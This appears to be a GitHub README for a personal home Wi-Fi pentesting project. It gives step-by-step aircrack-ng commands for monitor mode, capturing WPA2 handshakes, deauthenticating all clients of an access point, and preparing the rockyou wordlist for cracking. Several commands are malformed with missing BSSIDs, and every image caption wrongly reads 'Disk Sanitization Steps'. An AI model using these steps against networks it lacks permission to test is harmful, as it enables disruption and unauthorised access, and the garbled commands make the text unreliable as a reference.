Skip to content

Latest commit

 

History

History
88 lines (77 loc) · 3.93 KB

File metadata and controls

88 lines (77 loc) · 3.93 KB

Wi-Fi Pentesting Project Walkthrough

Description

This project simulates a full-scope penetration test on a personal home Wi-Fi network. It includes reconnaissance, vulnerability discovery, exploitation, and remediation. The goal is to demonstrate real-world offensive security skills using ethical testing practices, with all findings and methods documented for educational and professional development.

Languages and Utilities Used

  • Bash
  • Python
  • Aircrack-ng Suite
  • Wireshark
  • Alfa AWUS036ACH wireless adapter

Objectives

  • Set up a Wi-Fi pentesting environment
  • Capture WPA2 handshake packets
  • Attempt password cracking using dictionary attacks
  • Document methodology and personal insights

Project walk-through:

Run the "iw dev" command to view all the available Wi-Fi interfaces. In my example the interface is wlan0. We can also see that the adapter is in managed mode:
Disk Sanitization Steps

Run the "sudo airmon-ng check kill" command. "check kill" will kill any processes that might interfere with the aircrack-ng suite:
Disk Sanitization Steps

Run the "sudo airmon-ng start wlan0" command. This will switch our interface from managed mode to monitor mode:
Disk Sanitization Steps

Run the "sudo airodump-ng wlan0mon" command to show all the detected access points:
Disk Sanitization Steps

Breakdown of the output above:
Disk Sanitization Steps

Run the command "sudo airodump-ng -w captures -bssid wlan0mon" This will create a file that writes the 802.11 frames inside the file from the specified MAC Address. There will be no indication of a captured handshake before it is actually caputred:
Disk Sanitization Steps


Disk Sanitization Steps

Run the command "sudo aireplay-ng -deauth 0 -a wlan0mon. This will deathenticate all clients on the specified access point:
Disk Sanitization Steps

When the client tries to reconnect to the target access point, the handshake will be captured:
Disk Sanitization Steps

Run the "wireshark captures-01.cap" command to open the capture-01.cap file in wireshark:
Disk Sanitization Steps

In wireshark we want to enter "eapol" as the filter to get the 4-way handshake for Wi-Fi connections. We can see that (message 2 of 4) contains the WPA Key information:
Disk Sanitization Steps

Run the "sudo airmon-ng stop wlan0mon" command to put the Wi-Fi adapter back into managed mode:
Disk Sanitization Steps

Run the "sudo gzip -d /usr/share/wordlists/rockyou.txt.gz" command to unzip the worldlist file used to crack the Wi-Fi password:
Disk Sanitization Steps